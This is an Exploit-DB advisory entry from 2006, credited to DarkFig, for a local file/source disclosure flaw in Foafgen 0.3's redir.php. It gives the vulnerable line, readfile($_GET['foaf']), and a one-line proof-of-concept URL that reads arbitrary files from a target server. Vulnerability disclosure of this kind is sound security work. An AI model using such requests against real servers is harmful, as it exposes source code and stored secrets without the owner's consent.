Foafgen 0.3 - 'redir.php' Local Source Disclosure

Author: DarkFig
type: webapps
platform: php
port: 
date_added: 2006-10-09 
date_updated: 2016-09-12 
verified: 1 
codes: OSVDB-29669;CVE-2006-5319 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfoafgen_v0.3.0.zip

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: Foafgen v0.3
# Download....: http://www.toxi.co.uk/foafgen/foafgen_v0.3.0.zip
# Poc.........: http://victim.com/redir.php?foaf=file.php
# Vuln.code...: Line 4, readfile($_GET['foaf']);

# milw0rm.com [2006-10-10]